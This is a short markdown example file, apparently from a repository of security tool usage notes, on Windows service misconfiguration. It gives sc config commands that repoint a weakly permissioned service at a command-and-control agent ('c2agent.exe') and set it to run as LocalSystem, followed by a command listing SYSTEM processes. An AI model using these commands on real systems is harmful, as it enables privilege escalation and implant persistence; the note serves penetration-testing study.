ilkinur/tools-examples-use_guideline/examples/windows_analysis.md

 Any logged-in user can modify parameters for the VulnService service.
 To achieve this:
 `sc config VulnPath binpath="C:\temp\c2agent.exe"`
 `sc config VulnPath obj= ".\LocalSystem" password= ""`

+To find all processes currently running as SYSTEM, use the following command:
+`tasklist.exe /FI "username eq system" /v`